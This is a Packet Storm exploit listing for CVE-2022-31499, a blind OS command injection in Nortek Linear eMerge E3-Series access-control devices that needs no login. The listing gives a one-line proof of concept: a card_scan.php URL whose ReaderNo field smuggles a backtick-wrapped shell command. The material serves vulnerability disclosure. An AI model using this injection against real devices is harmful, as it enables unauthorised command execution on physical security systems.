Headline
CVE-2022-31499: Nortek Linear eMerge E3-Series Command Injection ≈ Packet Storm
Nortek Linear eMerge E3-Series devices before 0.32-08f allow an unauthenticated attacker to inject OS commands via ReaderNo. NOTE: this issue exists because of an incomplete fix for CVE-2019-7256.
Change Mirror Download
# Exploit Title: Nortek Linear eMerge E3-Series - Blind OS Command Injection# Exploit Author: Omar Hashim# Version: 0.32-09c# Vendor home page: https://www.nortekcontrol.com/access-control/# Vendor home page: https://linear-solutions.com/# Authentication Required: No# CVE: CVE-2022-31499# POC: ====================http:/<HOST:PORT>/card_scan.php?No=1337&ReaderNo=`sleep20`&CardFormatNo=1337Related news
Nortek Linear eMerge E3-Series Command Injection
Nortek Linear eMerge E3-Series version 0.32-09c suffers from a blind OS command injection vulnerability.